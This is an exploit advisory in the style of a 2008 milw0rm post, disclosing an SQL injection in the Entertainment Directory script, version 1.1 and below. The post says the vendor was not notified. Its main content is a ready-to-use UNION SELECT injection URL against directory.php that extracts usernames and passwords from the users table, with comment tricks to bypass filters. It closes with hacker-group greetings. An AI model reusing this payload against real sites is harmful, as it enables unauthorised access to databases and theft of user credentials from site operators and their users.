--==+ Entertainment Directory <= 1.1 SQL Injection Vulnerbility +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz & xprog Discovered On: 5 April 2008 Script Download: http://www.turnkeyzone.com DORK: N/A Vendor Has Not Been Notified! DESCRIPTION: Entertainment directory is vulnerable due to a insecure mysql query. this allows the remote attacker to obtain user credentials from the database. EXPLOITS: http://site.com/directory.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,CONCAT(username,char(58),password),9,10,11,12,13,14/**/FROM/**/users/* NOTE/TIP: GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew! --==+================================================================================+==-- --==+ Entertainment Directory <= 1.1 SQL Injection Vulnerbility +==-- --==+================================================================================+==-- # milw0rm.com [2008-04-05]
